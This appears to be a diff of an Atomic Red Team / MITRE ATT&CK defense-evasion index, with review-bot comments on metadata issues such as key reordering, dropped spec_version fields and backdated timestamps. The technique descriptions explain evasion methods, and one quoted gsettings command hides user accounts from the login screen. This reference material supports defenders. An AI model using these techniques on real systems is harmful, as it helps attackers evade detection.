@@ -10370,8 +10478,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1218.012:
@@ -10427,7 +10533,7 @@ defense-evasion:
not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation:
Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation:
Nick Tyrer GitHub) "
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:35:28.221Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Verclsid
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -10451,7 +10557,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.010:
technique:
@@ -10542,7 +10647,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.010
atomic_tests:
- name: ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
@@ -10585,35 +10689,7 @@ defense-evasion:
elevation_required: true
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -10625,6 +10701,10 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -10635,8 +10715,14 @@ defense-evasion:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
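Review bot: `x_mitre_modified_by_ref` is deleted here only to be re-inserted at a different position further down the object, and the same key reordering is repeated for almost every technique in this patch, which buries the handful of real changes (new platforms, new contributors, version bumps, new references) under hundreds of moved lines. If the exporter can emit keys in a stable order, or the regenerated file can be reviewed with a diff that ignores key order, the substantive changes become reviewable.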
@@ -10646,9 +10732,28 @@ defense-evasion:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1218.005:
technique:
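Review bot: `spec_version: '2.1'` is dropped here (and from every other object in this patch) while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0. `spec_version` is a required property on STIX 2.1 domain objects, so anything that validates these `technique` blocks as STIX 2.1 will start rejecting them; if the removal is intentional because only the ATT&CK spec version matters downstream, say so in the commit message.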
@@ -10701,7 +10806,7 @@ defense-evasion:
- source_name: LOLBAS Mshta
url: https://lolbas-project.github.io/lolbas/Binaries/Mshta/
description: LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T20:38:28.802Z'
name: 'Signed Binary Proxy Execution: Mshta'
description: "Adversaries may abuse mshta.exe to proxy execution of malicious
.hta files and Javascript or VBScript through a trusted Windows utility. There
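Review bot: `modified` moves backwards here (2022-05-11T14:00:00.188Z to 2022-03-11T20:38:28.802Z), and the same happens for Port Knocking, Hidden Users, Impair Command History Logging, Network Provider DLL, Parent PID Spoofing, VDSO Hijacking, Services File Permissions Weakness, KernelCallbackTable, ROMMONkit, Network Share Connection Removal, Modify System Image, Indicator Removal from Tools and Resource Forking. Every replaced value ends in `14:00:00.188Z`, which looks like a bulk-assigned release timestamp rather than a real last-modified time, so the new values are probably the authoritative ones; that deserves a sentence in the commit message, since anything that sorts or detects changes by `modified` will now see these objects as older than before.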
@@ -10739,68 +10844,72 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.005
atomic_tests: []
T1480:
technique:
+ modified: '2024-06-07T14:30:23.491Z'
+ name: Execution Guardrails
+ description: |-
+ Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
+
+ Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
+
+ Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_contributors:
+ - Nick Carr, Mandiant
+ x_mitre_deprecated: false
+ x_mitre_detection: Detecting the use of guardrails may be difficult depending
+ on the implementation. Monitoring for suspicious processes being spawned that
+ gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
+ especially in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Nick Carr, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Command: Command Execution'
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host Forensic Analysis
+ - Signature-based Detection
+ - Static File Analysis
type: attack-pattern
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1480
url: https://attack.mitre.org/techniques/T1480
+ external_id: T1480
- source_name: FireEye Outlook Dec 2019
- url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
+ url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
+ - source_name: Trellix-Qakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved June 7, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
- url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
-
- Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Execution Guardrails
- x_mitre_detection: Detecting the use of guardrails may be difficult depending
- on the implementation. Monitoring for suspicious processes being spawned that
- gather a variety of system information or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
- especially in a short period of time, may aid in detection.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Command: Command Execution'
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host Forensic Analysis
- - Signature-based Detection
- - Static File Analysis
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.001:
technique:
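Review bot: the new third paragraph of the description adds user-agent filtering as a guardrail (`Citation: Trellix-Qakbot`, matched by the new external_references entry and the 1.1 to 1.2 version bump), but `x_mitre_data_sources` still lists only `Process: Process Creation` and `Command: Command Execution`, and `x_mitre_detection` still only covers discovery activity on the host. A user-agent check runs on the adversary's delivery infrastructure, not on the victim, so neither listed data source can observe it; if this file must mirror upstream exactly, leave it as is, otherwise consider raising the gap upstream (a Network Traffic data source would be the relevant one).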
@@ -10858,7 +10967,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1205.001:
@@ -10884,7 +10992,7 @@ defense-evasion:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -10909,8 +11017,6 @@ defense-evasion:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1027.012:
technique:
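Review bot: `x_mitre_attack_spec_version: 2.1.0` is removed here with no replacement in the visible context, whereas other objects in this patch (T1497, T1480, T1078) get `x_mitre_attack_spec_version: 3.2.0` added. The same removal without a visible replacement appears for Mshta, KernelCallbackTable, ROMMONkit and Modify System Image; confirm the key is re-added outside the hunk context for each of them, otherwise those objects end up with no ATT&CK spec version at all.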
@@ -10971,7 +11077,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.002:
technique:
@@ -11044,7 +11149,7 @@ defense-evasion:
sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true
).(Citation:
Hide GDM User Accounts) Display Managers are not anchored to specific distributions
and may be changed by a user or adversary."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T02:31:01.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Hide Artifacts: Hidden Users'
x_mitre_detection: "Monitor for users that may be hidden from the login screen
@@ -11073,7 +11178,6 @@ defense-evasion:
- 'User Account: User Account Metadata'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.002
atomic_tests: []
T1134.003:
@@ -11137,11 +11241,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1562.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.940Z'
name: 'Impair Defenses: Impair Command History Logging'
description: "Adversaries may impair command history logging to hide commands
they run on a compromised system. Various command interpreters keep track
@@ -11226,7 +11329,6 @@ defense-evasion:
url: https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1562.003
atomic_tests:
- name: Disable history collection
@@ -11433,7 +11535,7 @@ defense-evasion:
'
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -11508,45 +11610,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -11570,6 +11637,9 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -11580,9 +11650,14 @@ defense-evasion:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -11592,8 +11667,35 @@ defense-evasion:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1134.004:
technique:
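Review bot: the Deloitte reference changes from the bare Drive URL to `.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` with a retrieval date of September 13, 2024, one day after this object's new `modified` value (2024-09-12T15:50:18.050Z); the same pair appears in T1497. `/edit` is the editor form of a Drive link, so confirm it resolves for readers without edit rights (`/view` is the usual share form), and a retrieval date later than `modified` is odd enough to be worth a second look.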
@@ -11650,7 +11752,7 @@ defense-evasion:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -11675,7 +11777,6 @@ defense-evasion:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1055.014:
@@ -11746,7 +11847,7 @@ defense-evasion:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -11773,11 +11874,10 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -11831,7 +11931,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1574.013:
technique:
@@ -11867,7 +11966,7 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -11893,8 +11992,6 @@ defense-evasion:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1542.004:
technique:
@@ -11920,7 +12017,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -11942,8 +12039,6 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1218.001:
technique:
@@ -12009,12 +12104,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.001
atomic_tests: []
T1070.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-13T17:15:56.948Z'
name: 'Indicator Removal on Host: Network Share Connection Removal'
description: 'Adversaries may remove share connections that are no longer useful
in order to clean up traces of their operation. Windows shared drive and [SMB/Windows
@@ -12069,7 +12163,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.005
atomic_tests: []
T1562.001:
@@ -12217,7 +12310,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562.001
atomic_tests:
- name: Disable syslog
@@ -12495,7 +12587,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:50:47.635Z'
name: Modify System Image
description: |-
Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.
@@ -12530,8 +12622,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574:
technique:
@@ -12597,7 +12687,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.005:
technique:
@@ -12623,7 +12712,7 @@ defense-evasion:
Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-28T16:07:48.062Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
